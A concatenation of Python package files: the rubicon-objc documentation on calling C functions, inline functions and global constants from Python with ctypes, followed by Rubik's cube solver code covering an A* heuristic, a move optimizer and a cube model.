We'll start with a simple example: calling the ``puts`` function from the C standard library. ``puts`` takes a C string and outputs it to standard output --- it's the C equivalent of a simple ``print`` call.
Before we can call the function, we need to look it up first. To do this, we need to find and load the library in which the function is defined. In the case of standard C functions, this is the standard C library, ``libc``. Because this library is commonly used, Rubicon already loads it by default and exposes it in Python as :attr:`rubicon.objc.runtime.libc`.
.. code-block:: python
>>> from rubicon.objc.runtime import libc
>>> libc
<CDLL '/usr/lib/libc.dylib', handle 7fff60d0cb90 at 0x105850b38>
.. note::
For a list of all C libraries that Rubicon loads and exposes by default, see the :ref:`predefined-c-libraries` section of the :mod:`rubicon.objc.runtime` reference documentation.
To access a library that is not predefined by Rubicon, you can use the :func:`~rubicon.objc.runtime.load_library` function:
.. code-block:: python
>>> from rubicon.objc.runtime import load_library
>>> libm = load_library("m")
>>> libm
<CDLL '/usr/lib/libm.dylib', handle 7fff60d0cb90 at 0x10596be10>
C functions are accessed as attributes on their library:
.. code-block:: python
>>> libc.puts
<_FuncPtr object at 0x110178f20>
However, unlike Objective-C methods, we cannot call C functions right away --- we must first declare the function's argument and return types. (Rubicon cannot do this automatically like with Objective-C methods, because plain C doesn't provide the runtime type information necessary for this.) This type information is found in C header files, in this case ``stdio.h`` (which defines standard C input/output functions, including ``puts``).
The exact location of the macOS C headers varies depending on your version of macOS and the developer tools --- it is not a fixed path. To open the header directory in the Finder, run the following command in the terminal:
.. code-block:: sh
$ open "$(xcrun --show-sdk-path)/usr/include"
.. note::
This command requires a version of the macOS developer tools to be installed. If you do not have Xcode or the command-line developer tools installed yet, run this command in the terminal to install the command-line developer tools:
.. code-block:: sh
$ xcode-select --install
Once you have opened the relevant header file in a text editor, you need to search for the declaration of the function you're looking for. In the case of ``puts``, it looks like this:
.. code-block:: c
int puts(const char *);
This means that ``puts`` returns an ``int`` and takes a single argument of type ``const char *`` (a pointer to one or more characters, i.e. a C string). This translates to the following Python ``ctypes`` code:
.. code-block:: python
>>> from ctypes import c_char_p, c_int
>>> libc.puts.restype = c_int
>>> libc.puts.argtypes = [c_char_p]
Now that we have provided all of the necessary type information, we can call ``libc.puts``.
For the ``c_char_p`` argument, we pass a byte string with the message we want to print out. ``ctypes`` automatically converts the byte string object to a ``c_char_p`` (``char *``) as the C function expects it. The string specifically needs to be a byte string (``bytes``), because C's ``char *`` strings are byte-based, unlike normal Python strings (``str``), which are Unicode-based.
.. code-block:: python
>>> res = libc.puts(b"Hello!")
Hello!
.. note::
If you're running this code from an editor or IDE and don't see ``Hello!`` printed out, try running the code from a Python REPL in a terminal window instead. Some editors/IDEs, such as Python's IDLE, can only capture and display output produced by high-level Python functions (such as ``print``), but not output from low-level C functions (such as ``puts``).
The return value of ``puts`` is ignored in this example. It indicates whether or not the call was successful. If ``puts`` succeeds, it returns a non-negative integer (the exact value is not significant and has no defined meaning). If ``puts`` encounters an error, it returns the ``EOF`` constant (on Apple OSes, this is ``-1``).
The ``puts`` function generally doesn't fail, except for edge cases that are unlikely to happen in practice. With most other C functions, you need to be more careful about checking the return value, to make sure that errors from the function call are detected and handled. Unlike in Python, if you forget to check whether a C function call failed, any errors from that call are silently ignored, which often leads to bad behavior or crashes.
Most real examples of C functions are more complicated than ``puts``, but the basic procedure for calling them is the same: import or load the function's C library, set the function's return type and argument types based on the relevant header, and then call the function as needed.
Each C library only needs to be imported/loaded once, and the ``restype`` and ``argtypes`` only need to be set once per function. This is usually done at module level near the beginning of the module, similar to Python imports.
Inline functions (e.g. ``NSLocationInRange``)
---------------------------------------------
Regular C functions can be called as explained above, but there is also a second kind of C function that needs to be handled differently: inline functions. Unlike regular C functions, inline functions cannot be called through a library object at runtime. Instead, their implementation is only provided as source code in a header file.
When an inline function is called from regular C code, the C compiler copies (inlines) the inline function's implementation into the calling code. To call an inline C function from Python, we need to do the same thing --- copy the code from the header into our own code --- but in addition we need to translate the C code from the header into equivalent Python/``ctypes`` code.
As an example we will use the function ``NSLocationInRange`` from the Foundation framework. This function checks whether an index lies inside a ``NSRange`` value. The definition of this function, from the Foundation header ``NSRange.h``, looks like this:
.. code-block:: objc
NS_INLINE BOOL NSLocationInRange(NSUInteger loc, NSRange range) {
return (!(loc < range.location) && (loc - range.location) < range.length) ? YES : NO;
}
In this case, the translation to Python consists (roughly) of the following steps:
1. The outer part of the function definition needs to be translated to Python's ``def`` syntax. The return type and argument types can be omitted in the Python code --- because Python is dynamically typed, these explicit types are not needed.
2. The ``YES`` and ``NO`` constants in the ``return`` expressions need to be replaced with their Python equivalents, ``True`` and ``False``.
3. Some operators in the ``return`` expression need to be changed: C ``!cond`` translates to Python ``not cond``, C ``left && right`` becomes ``left and right``, and C ``cond ? true_val : false_val`` becomes ``true_val if cond else false_val``.
The translated Python code looks like this:
.. code-block:: python
def NSLocationInRange(loc, range):
return True if (not (loc < range.location) and (loc - range.location) < range.length) else False
You can then put this translated function into your Python code and call it in place of the corresponding C inline function.
.. note::
Python code translated from C like this is sometimes more complicated than necessary and can be simplified. In this case for example, ``True if cond else False`` can be simplified to just ``cond``, ``not (x < y)`` can be simplified to ``x >= y``, and a few redundant parentheses can be removed. A cleaner version of the translated code might look like this:
.. code-block:: python
def NSLocationInRange(loc, range):
return loc >= range.location and loc - range.location < range.length
Global variables and constants (e.g. ``NSFoundationVersionNumber``)
-------------------------------------------------------------------
Some C libraries expose not just functions, but also global variables. An example of this is the Foundation framework, which defines the global variable ``NSFoundationVersionNumber`` in ``<Foundation/NSObjCRuntime.h>``:
.. code-block:: objc
FOUNDATION_EXPORT double NSFoundationVersionNumber;
Like functions, global variables are accessed via the library that they are defined by. The syntax is somewhat different for global variables though - instead of reading them directly as attributes of the library object, you use the ``in_dll`` method of the variable's *type*. (Every ``ctypes`` type has an ``in_dll`` method.)
.. code-block:: python
>>> from ctypes import c_double
>>> from rubicon.objc.runtime import Foundation
>>> NSFoundationVersionNumber = c_double.in_dll(Foundation, "NSFoundationVersionNumber")
>>> NSFoundationVersionNumber
c_double(1575.23)
Note that ``in_dll`` doesn't return the variable's value directly - instead it returns a ``ctypes`` data object that has the variable's type, in this case ``c_double``. To access the variable's actual value, you can use the data object's ``value`` attribute:
.. code-block:: python
>>> NSFoundationVersionNumber.value
1575.23
Objective-C object constants
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
A special case of global variables is often found in Objective-C libraries: object constants. These are global Objective-C object variables with a ``const`` modifier, meaning that they cannot be modified. Constants of type ``NSString *`` are especially common and can be found in many places, such as Foundation's ``<Foundation/NSMetadataAttribute.h>``:
.. code-block:: objc
FOUNDATION_EXPORT NSString * const NSMetadataItemFSNameKey;
Because they are so common, Rubicon provides the convenience function ``objc_const`` specifically for accessing Objective-C object constants:
.. code-block:: python
>>> from rubicon.objc import objc_const
>>> from rubicon.objc.runtime import Foundation
>>> NSMetadataItemFSNameKey = objc_const(Foundation, "NSMetadataItemFSNameKey")
>>> NSMetadataItemFSNameKey
<rubicon.objc.collections.ObjCStrInstance 0x10eecf350: __NSCFConstantString at 0x1072a67e8: kMDItemFSName>
.. note::
Sometimes it's not obvious that a constant is an Objective-C object, because its actual type is hidden behind a ``typedef``. This is common with the "extensible string enum" pattern, where a set of related string constants are defined together. An example can be found in ``<Foundation/NSCalendar.h>``:
.. code-block:: objc
typedef NSString * NSCalendarIdentifier NS_EXTENSIBLE_STRING_ENUM;
FOUNDATION_EXPORT NSCalendarIdentifier const NSCalendarIdentifierGregorian;
FOUNDATION_EXPORT NSCalendarIdentifier const NSCalendarIdentifierBuddhist;
FOUNDATION_EXPORT NSCalendarIdentifier const NSCalendarIdentifierChinese;
// ... many more ...
Even though the constants use the type name ``NSCalendarIdentifier``, their actual type is still ``NSString *``, based on the ``typedef`` before.
In some cases, constants use a ``typedef`` from a different header (or even a different library) than the one defining the constants, which can make it even harder to tell that they are actually Objective-C objects.
A complex example: ``dispatch_get_main_queue``
----------------------------------------------
As a final example, we'll look at the function ``dispatch_get_main_queue`` from
the ``libdispatch`` library. This is a very complex function definition, which
involves many of the concepts introduced above, as well as heavy use of C
pre-processor macros. If you don't have a lot of experience with the C
pre-processor, you may want to skip this section.
.. This example is based on the response to a question from the beeware/general Gitter chat: https://gitter.im/beeware/general?at=5b54e95357f4f664b794cde2
First, we need to look at the function's definition, which is found in the header ``<dispatch/queue.h>``:
.. code-block:: objc
DISPATCH_INLINE DISPATCH_ALWAYS_INLINE DISPATCH_CONST DISPATCH_NOTHROW
dispatch_queue_main_t
dispatch_get_main_queue(void)
{
return DISPATCH_GLOBAL_OBJECT(dispatch_queue_main_t, _dispatch_main_q);
}
This is an inline function, which you can see based on the fact that it has a function body and the ``DISPATCH_INLINE``/``DISPATCH_ALWAYS_INLINE`` attributes. This means that we cannot look it up directly using ``ctypes`` - instead we have to translate the function body from C to Python.
We can ignore the first line of the function definition - they contain function attributes intended for the compiler, which we don't need. The second and third line indicate the function's signature - it takes no arguments and returns a value of type ``dispatch_queue_main_t``.
The body is a little more complex: it uses ``DISPATCH_GLOBAL_OBJECT``, which is actually a C macro. Its definition can be found in ``<dispatch/object.h>``:
.. code-block:: objc
#define DISPATCH_GLOBAL_OBJECT(type, object) ((OS_OBJECT_BRIDGE type)&(object))
If we substitute the macro's parameters (``type`` and ``object``) for their real values in our case (``dispatch_queue_main_t`` and ``_dispatch_main_q``), we get the expression ``((OS_OBJECT_BRIDGE dispatch_queue_main_t)&(_dispatch_main_q))``. ``OS_OBJECT_BRIDGE`` is also a macro, this time from ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_BRIDGE __bridge
It expands to ``__bridge``, which is an attribute related to Objective-C's automatic reference counting (ARC) feature. In the context of Rubicon, ARC is not relevant (Rubicon performs its own reference management for Objective-C objects), so we can ignore this attribute. This leaves us with the expression ``((dispatch_queue_main_t)&(_dispatch_main_q))``, which we can substitute for the macro call in our original function:
.. code-block:: objc
dispatch_queue_main_t
dispatch_get_main_queue(void)
{
return (dispatch_queue_main_t)&(_dispatch_main_q));
}
With the macro expansion done, we can now see what the function does: it takes a pointer to the global variable ``_dispatch_main_q`` and casts it to the type ``dispatch_queue_main_t``.
First, let's look at the definition of the ``_dispatch_main_q`` variable, from ``<dispatch/queue.h>``:
.. code-block:: objc
DISPATCH_EXPORT
struct dispatch_queue_s _dispatch_main_q;
The variable's type, ``struct dispatch_queue_s``, is an *opaque* structure type - it is not defined in any public header. This means that we don't know what fields the structure has, or even how large it is. As a result, we cannot perform any operations on the structure itself, but we can work with *pointers* to the structure - which is exactly what ``dispatch_get_main_queue`` does.
Even though ``struct dispatch_queue_s`` is opaque, we still need to define it in Python so that we can look up the ``_dispatch_main_q`` variable:
.. code-block:: python
from ctypes import Structure
from rubicon.objc.runtime import load_library
# On Mac, libdispatch is part of libSystem.
libSystem = load_library("System")
libdispatch = libSystem
class struct_dispatch_queue_s(Structure):
pass # No _fields_, because this is an opaque structure.
_dispatch_main_q = struct_dispatch_queue_s.in_dll(libdispatch, "_dispatch_main_q")
Now we need to look at the definition of the ``dispatch_queue_main_t`` type. This definition is not very obvious to find - it's actually this line in ``<dispatch/queue.h>``:
.. code-block:: objc
DISPATCH_DECL_SUBCLASS(dispatch_queue_main, dispatch_queue_serial);
``DISPATCH_DECL_SUBCLASS`` is a macro from ``<dispatch/object.h>``, defined like this:
.. code-block:: objc
#define DISPATCH_DECL_SUBCLASS(name, base) OS_OBJECT_DECL_SUBCLASS(name, base)
It directly calls another macro, ``OS_OBJECT_DECL_SUBCLASS``, defined in ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_DECL_SUBCLASS(name, super) \
OS_OBJECT_DECL_IMPL(name, <OS_OBJECT_CLASS(super)>)
Let's substitute this macro into our original code:
.. code-block:: objc
OS_OBJECT_DECL_IMPL(dispatch_queue_main, <OS_OBJECT_CLASS(dispatch_queue_serial)>);
Next is the ``OS_OBJECT_DECL_IMPL`` macro, also defined in ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_DECL_IMPL(name, ...) \
OS_OBJECT_DECL_PROTOCOL(name, __VA_ARGS__) \
typedef NSObject<OS_OBJECT_CLASS(name)> \
* OS_OBJC_INDEPENDENT_CLASS name##_t
After we substitute this macro into our code, it looks like this:
.. code-block:: objc
OS_OBJECT_DECL_PROTOCOL(dispatch_queue_main, <OS_OBJECT_CLASS(dispatch_queue_serial)>) \
typedef NSObject<OS_OBJECT_CLASS(dispatch_queue_main)> \
* OS_OBJC_INDEPENDENT_CLASS dispatch_queue_main_t;
And another macro, ``OS_OBJECT_DECL_PROTOCOL``, also from ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_DECL_PROTOCOL(name, ...) \
@protocol OS_OBJECT_CLASS(name) __VA_ARGS__ \
@end
Which we can substitute into our code:
.. code-block:: objc
@protocol OS_OBJECT_CLASS(dispatch_queue_main) <OS_OBJECT_CLASS(dispatch_queue_serial)> \
@end \
typedef NSObject<OS_OBJECT_CLASS(dispatch_queue_main)> \
* OS_OBJC_INDEPENDENT_CLASS dispatch_queue_main_t;
Now let's take care of the ``OS_OBJECT_CLASS`` macro, defined like this in ``<os/object.h>``:
.. code-block:: objc
#define OS_OBJECT_CLASS(name) OS_##name
And substituted into our code:
.. code-block:: objc
@protocol OS_dispatch_queue_main <OS_dispatch_queue_serial> \
@end \
typedef NSObject<OS_dispatch_queue_main> \
* OS_OBJC_INDEPENDENT_CLASS dispatch_queue_main_t;
Finally we're left with the ``OS_OBJECT_INDEPENDENT_CLASS`` macro, which is a compiler attribute that we can ignore.
.. code-block:: objc
@protocol OS_dispatch_queue_main <OS_dispatch_queue_serial>
@end
typedef NSObject<OS_dispatch_queue_main> * dispatch_queue_main_t;
Now we're done with macro expansion and can see what the code actually does - it defines an Objective-C protocol called ``OS_dispatch_queue_main`` and defines ``dispatch_queue_main_t`` as a pointer type to an object conforming to that protocol. For our purposes, most of these details don't matter - the important part is that ``dispatch_queue_main_t`` is actually an Objective-C object pointer type. Because Rubicon doesn't differentiate between object pointer types, we can replace ``dispatch_queue_main_t`` in our original function with the generic ``id`` type:
.. code-block:: objc
id
dispatch_get_main_queue(void)
{
return (id)&(_dispatch_main_q));
}
This code can finally be translated to Python:
.. code-block:: python
from ctypes import byref, cast
from rubicon.objc import ObjCInstance
from rubicon.objc.runtime import objc_id
# This requires the _dispatch_main_q Python code from before.
def dispatch_get_main_queue():
return ObjCInstance(cast(byref(_dispatch_main_q), objc_id))
Further information
-------------------
* `cdecl.org <https://cdecl.org/>`_: An online service to translate C type syntax into more understandable English.
* `cppreference.com <https://en.cppreference.com/w/>`_: A reference site about the standard C and C++ languages and libraries.
* `Apple's reference documentation <https://developer.apple.com/documentation/>`_: Official API documentation for Apple platforms. Make sure to change the language to Objective-C in the top-right corner, otherwise you'll get Swift documentation, which can differ significantly from Objective-C.
* macOS man pages, sections 2 and 3: Documentation for the C functions provided by macOS. View these using the ``man`` command, or by typing a function name into the search box of the macOS Terminal's Help menu.
| /rubicon-objc-0.4.6.tar.gz/rubicon-objc-0.4.6/docs/how-to/c-functions.rst | 0.872538 | 0.770508 | c-functions.rst | pypi |
import numpy as np
from .cube import Cube
from typing import Callable
def same_color_amount(combinations: np.array) -> int:
"""Sum of the largest amount of same colors on a face.
On a 5x5x5 cube largest possible amount is 6*5*5 = 150.
*bigger the better*
Args:
combinations (np.array): A combination of a cube. shape: (6, n, n)
Returns:
int: Value of the heuristic.
"""
# check if the colors are the same on the same face
same_color_amount = 0
for face in combinations:
value_counts = np.unique(face, return_counts=True)[1]
same_color_amount += np.max(value_counts)
# but we need a function that returns a smaller value for a better solution
# so we subtract the value from the maximum possible value
max_possible_value = 6*combinations.shape[1]*combinations.shape[2]
return max_possible_value - same_color_amount
class AStarSolver():
def __init__(self, cube: Cube, heuristic: Callable):
"""Initialize the solver.
Args:
combinations (np.array): A combination of a cube.
"""
self.cube = cube
self.heuristic = heuristic
self.possible_moves = cube.get_possible_moves() # possible moves are constant
# lets remove rotational moves from the possible moves
self.possible_moves = [move for move in self.possible_moves if not (("x" in move) or ("y" in move) or ("z" in move))]
def make_str(self, combinations: np.array) -> str:
"""Make a string from the combinations.
Args:
combinations (np.array): A combination of a cube.
Returns:
str: The string.
"""
return "".join(["".join(x_row) for face in combinations for x_row in face])
def solve(self) -> str:
"""Solve the cube.
Returns:
str: The solution.
"""
if self.cube.is_solved():
print("Cube is already solved!")
return ""
# current combinations of the cube
initial_combinations = self.cube.combinations.copy()
visited = [str(initial_combinations)]
queue = [(initial_combinations, (), self.heuristic(initial_combinations))]
# queue elements in the form of (combinations, path, value)
print("current best cube value: ", queue[0][2])
while queue:
# sort the queue by the value of the elements
queue = sorted(queue, key=lambda x: len(x[1])+ x[2]) # length of the path + evaluation value
# get the element with the lowest value
combinations, path, value = queue.pop(0)
# check if the cube is solved
new_cube = Cube.from_combinations(combinations)
if new_cube.is_solved():
return path
for move in self.possible_moves:
child_cube = Cube.from_combinations(combinations.copy())
child_cube.make_move(move)
new_combinations = child_cube.combinations
# check if the new combinations are already visited
if str(new_combinations) not in visited:
visited.append(str(new_combinations))
queue_element = (new_combinations.copy(), (*path, move), self.heuristic(new_combinations))
queue.append(queue_element)
if child_cube.is_solved():
return queue_element[1]
raise ValueError("Invalid cube!") | /rubics_cube-0.1.0-py3-none-any.whl/rubics_cube/heuristics.py | 0.891173 | 0.674456 | heuristics.py | pypi |
from rubik import cube
X_ROT_CW = {
'U': 'F',
'B': 'U',
'D': 'B',
'F': 'D',
'E': 'Si',
'S': 'E',
'Y': 'Z',
'Z': 'Yi',
}
Y_ROT_CW = {
'B': 'L',
'R': 'B',
'F': 'R',
'L': 'F',
'S': 'Mi',
'M': 'S',
'Z': 'X',
'X': 'Zi'
}
Z_ROT_CW = {
'U': 'L',
'R': 'U',
'D': 'R',
'L': 'D',
'E': 'Mi',
'M': 'E',
'Y': 'Xi',
'X': 'Y',
}
X_ROT_CC = {v: k for k, v in X_ROT_CW.items()}
Y_ROT_CC = {v: k for k, v in Y_ROT_CW.items()}
Z_ROT_CC = {v: k for k, v in Z_ROT_CW.items()}
def get_rot_table(rot):
if rot == 'X': return X_ROT_CW
elif rot == 'Xi': return X_ROT_CC
elif rot == 'Y': return Y_ROT_CW
elif rot == 'Yi': return Y_ROT_CC
elif rot == 'Z': return Z_ROT_CW
elif rot == 'Zi': return Z_ROT_CC
def _invert(move):
if move.endswith('i'):
return move[:1]
return move + 'i'
def apply_repeat_three_optimization(moves):
""" R, R, R --> Ri """
changed = False
i = 0
while i < len(moves) - 2:
if moves[i] == moves[i+1] == moves[i+2]:
moves[i:i+3] = [_invert(moves[i])]
changed = True
else:
i += 1
if changed:
apply_repeat_three_optimization(moves)
def apply_do_undo_optimization(moves):
""" R Ri --> <nothing>, R R Ri Ri --> <nothing> """
changed = False
i = 0
while i < len(moves) - 1:
if _invert(moves[i]) == moves[i+1]:
moves[i:i+2] = []
changed = True
else:
i += 1
if changed:
apply_do_undo_optimization(moves)
def _unrotate(rot, moves):
rot_table = get_rot_table(rot)
result = []
for move in moves:
if move in rot_table:
result.append(rot_table[move])
elif _invert(move) in rot_table:
result.append(_invert(rot_table[_invert(move)]))
else:
result.append(move)
return result
def apply_no_full_cube_rotation_optimization(moves):
rots = {'X', 'Y', 'Z', 'Xi', 'Yi', 'Zi'}
changed = False
i = 0
while i < len(moves):
if moves[i] not in rots:
i += 1
continue
for j in reversed(range(i + 1, len(moves))):
if moves[j] == _invert(moves[i]):
moves[i:j+1] = _unrotate(moves[i], moves[i+1:j])
changed = True
break
i += 1
if changed:
apply_no_full_cube_rotation_optimization(moves)
def optimize_moves(moves):
result = list(moves)
apply_no_full_cube_rotation_optimization(result)
apply_repeat_three_optimization(result)
apply_do_undo_optimization(result)
return result
if __name__ == '__main__':
test_seq_1 = ("Li Li E L Ei Li B Ei R E Ri Z E L Ei Li Zi U U Ui Ui Ui B U B B B Bi "
"Ri B R Z U U Ui Ui Ui B U B B B Ri B B R Bi Bi D Bi Di Z Ri B B R Bi "
"Bi D Bi Di Z B B Bi Ri B R Z B L Bi Li Bi Di B D B Bi Di B D B L Bi Li "
"Z B B B Bi Di B D B L Bi Li Z B Bi Di B D B L Bi Li Z B B B L Bi Li Bi "
"Di B D Z X X F F D F R Fi Ri Di Xi Xi X X Li Fi L D F Di Li F L F F Zi "
"Li Fi L D F Di Li F L F F Z F Li Fi L D F Di Li F L F Li Fi L D F Di "
"Li F L F F Xi Xi X X Ri Fi R Fi Ri F F R F F F R F Ri F R F F Ri F F F "
"F Ri Fi R Fi Ri F F R F F F R F Ri F R F F Ri F F Xi Xi X X R R F D Ui "
"R R Di U F R R R R F D Ui R R Di U F R R Z Z Z Z Z Z R R F D Ui R R Di "
"U F R R Z Z Z Z R R F D Ui R R Di U F R R Z Z Z Z Z Ri S Ri Ri S S Ri "
"Fi Fi R Si Si Ri Ri Si R Fi Fi Zi Xi Xi")
moves = test_seq_1.split()
print("{len(moves)} moves: {' '.join(moves)}")
opt = optimize_moves(moves)
print("{len(opt)} moves: {' '.join(opt)}")
orig = cube.Cube("OOOOOOOOOYYYWWWGGGBBBYYYWWWGGGBBBYYYWWWGGGBBBRRRRRRRRR")
c, d = cube.Cube(orig), cube.Cube(orig)
c.sequence(" ".join(moves))
d.sequence(" ".join(opt))
print(c, '\n')
print(d)
assert c == d | /rubik-cube-0.0.2.tar.gz/rubik-cube-0.0.2/rubik/optimize.py | 0.564339 | 0.413951 | optimize.py | pypi |
import string
from rubik.maths import Point, Matrix
RIGHT = X_AXIS = Point(1, 0, 0)
LEFT = Point(-1, 0, 0)
UP = Y_AXIS = Point(0, 1, 0)
DOWN = Point(0, -1, 0)
FRONT = Z_AXIS = Point(0, 0, 1)
BACK = Point(0, 0, -1)
FACE = 'face'
EDGE = 'edge'
CORNER = 'corner'
# 90 degree rotations in the XY plane. CW is clockwise, CC is counter-clockwise.
ROT_XY_CW = Matrix(0, 1, 0,
-1, 0, 0,
0, 0, 1)
ROT_XY_CC = Matrix(0, -1, 0,
1, 0, 0,
0, 0, 1)
# 90 degree rotations in the XZ plane (around the y-axis when viewed pointing toward you).
ROT_XZ_CW = Matrix(0, 0, -1,
0, 1, 0,
1, 0, 0)
ROT_XZ_CC = Matrix(0, 0, 1,
0, 1, 0,
-1, 0, 0)
# 90 degree rotations in the YZ plane (around the x-axis when viewed pointing toward you).
ROT_YZ_CW = Matrix(1, 0, 0,
0, 0, 1,
0, -1, 0)
ROT_YZ_CC = Matrix(1, 0, 0,
0, 0, -1,
0, 1, 0)
def get_rot_from_face(face):
"""
:param face: One of FRONT, BACK, LEFT, RIGHT, UP, DOWN
:return: A pair (CW, CC) given the clockwise and counterclockwise rotations for that face
"""
if face == RIGHT: return "R", "Ri"
elif face == LEFT: return "L", "Li"
elif face == UP: return "U", "Ui"
elif face == DOWN: return "D", "Di"
elif face == FRONT: return "F", "Fi"
elif face == BACK: return "B", "Bi"
return None
class Piece:
def __init__(self, pos, colors):
"""
:param pos: A tuple of integers (x, y, z) each ranging from -1 to 1
:param colors: A tuple of length three (x, y, z) where each component gives the color
of the side of the piece on that axis (if it exists), or None.
"""
assert all(type(x) == int and x in (-1, 0, 1) for x in pos)
assert len(colors) == 3
self.pos = pos
self.colors = list(colors)
self._set_piece_type()
def __str__(self):
colors = "".join(c for c in self.colors if c is not None)
return f"({self.type}, {colors}, {self.pos})"
def _set_piece_type(self):
if self.colors.count(None) == 2:
self.type = FACE
elif self.colors.count(None) == 1:
self.type = EDGE
elif self.colors.count(None) == 0:
self.type = CORNER
else:
raise ValueError(f"Must have 1, 2, or 3 colors - given colors={self.colors}")
def rotate(self, matrix):
"""Apply the given rotation matrix to this piece."""
before = self.pos
self.pos = matrix * self.pos
# we need to swap the positions of two things in self.colors so colors appear
# on the correct faces. rot gives us the axes to swap between.
rot = self.pos - before
if not any(rot):
return # no change occurred
if rot.count(0) == 2:
rot += matrix * rot
assert rot.count(0) == 1, (
f"There is a bug in the Piece.rotate() method!"
f"\nbefore: {before}"
f"\nself.pos: {self.pos}"
f"\nrot: {rot}"
)
i, j = (i for i, x in enumerate(rot) if x != 0)
self.colors[i], self.colors[j] = self.colors[j], self.colors[i]
class Cube:
"""Stores Pieces which are addressed through an x-y-z coordinate system:
-x is the LEFT direction, +x is the RIGHT direction
-y is the DOWN direction, +y is the UP direction
-z is the BACK direction, +z is the FRONT direction
"""
def _from_cube(self, c):
self.faces = [Piece(pos=Point(p.pos), colors=p.colors) for p in c.faces]
self.edges = [Piece(pos=Point(p.pos), colors=p.colors) for p in c.edges]
self.corners = [Piece(pos=Point(p.pos), colors=p.colors) for p in c.corners]
self.pieces = self.faces + self.edges + self.corners
def _assert_data(self):
assert len(self.pieces) == 26
assert all(p.type == FACE for p in self.faces)
assert all(p.type == EDGE for p in self.edges)
assert all(p.type == CORNER for p in self.corners)
def __init__(self, cube_str):
"""
cube_str looks like:
UUU 0 1 2
UUU 3 4 5
UUU 6 7 8
LLL FFF RRR BBB 9 10 11 12 13 14 15 16 17 18 19 20
LLL FFF RRR BBB 21 22 23 24 25 26 27 28 29 30 31 32
LLL FFF RRR BBB 33 34 35 36 37 38 39 40 41 42 43 44
DDD 45 46 47
DDD 48 49 50
DDD 51 52 53
Note that the back side is mirrored in the horizontal axis during unfolding.
Each 'sticker' must be a single character.
"""
if isinstance(cube_str, Cube):
self._from_cube(cube_str)
return
cube_str = "".join(x for x in cube_str if x not in string.whitespace)
assert len(cube_str) == 54
self.faces = (
Piece(pos=RIGHT, colors=(cube_str[28], None, None)),
Piece(pos=LEFT, colors=(cube_str[22], None, None)),
Piece(pos=UP, colors=(None, cube_str[4], None)),
Piece(pos=DOWN, colors=(None, cube_str[49], None)),
Piece(pos=FRONT, colors=(None, None, cube_str[25])),
Piece(pos=BACK, colors=(None, None, cube_str[31])))
self.edges = (
Piece(pos=RIGHT + UP, colors=(cube_str[16], cube_str[5], None)),
Piece(pos=RIGHT + DOWN, colors=(cube_str[40], cube_str[50], None)),
Piece(pos=RIGHT + FRONT, colors=(cube_str[27], None, cube_str[26])),
Piece(pos=RIGHT + BACK, colors=(cube_str[29], None, cube_str[30])),
Piece(pos=LEFT + UP, colors=(cube_str[10], cube_str[3], None)),
Piece(pos=LEFT + DOWN, colors=(cube_str[34], cube_str[48], None)),
Piece(pos=LEFT + FRONT, colors=(cube_str[23], None, cube_str[24])),
Piece(pos=LEFT + BACK, colors=(cube_str[21], None, cube_str[32])),
Piece(pos=UP + FRONT, colors=(None, cube_str[7], cube_str[13])),
Piece(pos=UP + BACK, colors=(None, cube_str[1], cube_str[19])),
Piece(pos=DOWN + FRONT, colors=(None, cube_str[46], cube_str[37])),
Piece(pos=DOWN + BACK, colors=(None, cube_str[52], cube_str[43])),
)
self.corners = (
Piece(pos=RIGHT + UP + FRONT, colors=(cube_str[15], cube_str[8], cube_str[14])),
Piece(pos=RIGHT + UP + BACK, colors=(cube_str[17], cube_str[2], cube_str[18])),
Piece(pos=RIGHT + DOWN + FRONT, colors=(cube_str[39], cube_str[47], cube_str[38])),
Piece(pos=RIGHT + DOWN + BACK, colors=(cube_str[41], cube_str[53], cube_str[42])),
Piece(pos=LEFT + UP + FRONT, colors=(cube_str[11], cube_str[6], cube_str[12])),
Piece(pos=LEFT + UP + BACK, colors=(cube_str[9], cube_str[0], cube_str[20])),
Piece(pos=LEFT + DOWN + FRONT, colors=(cube_str[35], cube_str[45], cube_str[36])),
Piece(pos=LEFT + DOWN + BACK, colors=(cube_str[33], cube_str[51], cube_str[44])),
)
self.pieces = self.faces + self.edges + self.corners
self._assert_data()
def is_solved(self):
def check(colors):
assert len(colors) == 9
return all(c == colors[0] for c in colors)
return (check([piece.colors[2] for piece in self._face(FRONT)]) and
check([piece.colors[2] for piece in self._face(BACK)]) and
check([piece.colors[1] for piece in self._face(UP)]) and
check([piece.colors[1] for piece in self._face(DOWN)]) and
check([piece.colors[0] for piece in self._face(LEFT)]) and
check([piece.colors[0] for piece in self._face(RIGHT)]))
def _face(self, axis):
"""
:param axis: One of LEFT, RIGHT, UP, DOWN, FRONT, BACK
:return: A list of Pieces on the given face
"""
assert axis.count(0) == 2
return [p for p in self.pieces if p.pos.dot(axis) > 0]
def _slice(self, plane):
"""
:param plane: A sum of any two of X_AXIS, Y_AXIS, Z_AXIS (e.g. X_AXIS + Y_AXIS)
:return: A list of Pieces in the given plane
"""
assert plane.count(0) == 1
i = next((i for i, x in enumerate(plane) if x == 0))
return [p for p in self.pieces if p.pos[i] == 0]
def _rotate_face(self, face, matrix):
self._rotate_pieces(self._face(face), matrix)
def _rotate_slice(self, plane, matrix):
self._rotate_pieces(self._slice(plane), matrix)
def _rotate_pieces(self, pieces, matrix):
for piece in pieces:
piece.rotate(matrix)
# Rubik's Cube Notation: http://ruwix.com/the-rubiks-cube/notation/
def L(self): self._rotate_face(LEFT, ROT_YZ_CC)
def Li(self): self._rotate_face(LEFT, ROT_YZ_CW)
def R(self): self._rotate_face(RIGHT, ROT_YZ_CW)
def Ri(self): self._rotate_face(RIGHT, ROT_YZ_CC)
def U(self): self._rotate_face(UP, ROT_XZ_CW)
def Ui(self): self._rotate_face(UP, ROT_XZ_CC)
def D(self): self._rotate_face(DOWN, ROT_XZ_CC)
def Di(self): self._rotate_face(DOWN, ROT_XZ_CW)
def F(self): self._rotate_face(FRONT, ROT_XY_CW)
def Fi(self): self._rotate_face(FRONT, ROT_XY_CC)
def B(self): self._rotate_face(BACK, ROT_XY_CC)
def Bi(self): self._rotate_face(BACK, ROT_XY_CW)
def M(self): self._rotate_slice(Y_AXIS + Z_AXIS, ROT_YZ_CC)
def Mi(self): self._rotate_slice(Y_AXIS + Z_AXIS, ROT_YZ_CW)
